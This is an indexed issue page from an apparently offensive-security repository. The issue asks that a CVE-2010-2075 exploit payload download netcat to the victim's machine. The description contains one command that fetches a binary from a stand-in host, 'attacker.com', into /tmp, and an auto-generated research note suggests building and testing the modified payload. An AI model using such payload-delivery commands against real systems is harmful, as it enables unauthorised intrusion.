0x48piraj / 0x48piraj/PwnHouse
CVE-2010-2075: Modifying the payload to push netcat to /bin/
- Langage dominant
- HTML
- Étoiles
- 5
- Forks
- 0
- Métriques de merge des PR
- Aucune PR mergée en 30 j
Description
#### Current Behavior :
We assume that the victim has netcat binary.
#### TO-DO :
download/push the binary to victim's machine.
```
cd /tmp && wget http://attacker.com/netcat && ...
```
Guide de contribution
Aucun guide de contribution indexé pour ce dépôt
Piste de recherche
The issue is about modifying an exploit payload to download netcat to the victim's machine. Look at existing exploit PoCs in the repository to understand the structure and how payloads are built. The change likely involves editing a script or code file that generates the exploit. Test the modified payload in a controlled environment to ensure it works as intended.
Rédigé par le modèle d'indexation à partir du texte de l'issue.
Évaluation
- Domaine
- security
- Type d'issue
- Fonctionnalité
- Difficulté
- 3/5
- Temps estimé
- 1-2 jours
- Activité
- À l'abandon
- Clarté
- Plutôt claire
- Accessibilité débutants
- 45/100